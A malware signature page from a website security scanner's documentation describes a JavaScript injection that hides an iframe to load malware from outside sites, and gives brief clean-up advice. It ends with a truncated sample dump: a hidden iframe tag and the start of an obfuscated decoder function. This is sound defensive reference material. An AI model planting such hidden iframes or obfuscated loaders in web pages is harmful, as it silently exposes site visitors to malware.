SiteCheck Signatures

  1. Home
  2. Docs
  3. SiteCheck Signatures
  4. malware-entry-mwiframegcounter



Javascript encoded to hide an iframe from (and some intermediary domains, like, etc).
This is used to load malware from external web sites while not being visible to the user.


Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding. Searching/replacing any entry should fix it.

Malware dump (sample of malware):

< iframe src = style=display:none> 


function B0B5A2EAEFDB35(F917C94BD6DC){var A9126BAF8=261;.. A9126BAF8=A9126BAF8-245;return(parseInt(F917C94BD6DC,A9126BAF8));}function F5F7FDC388(C8FAD8){var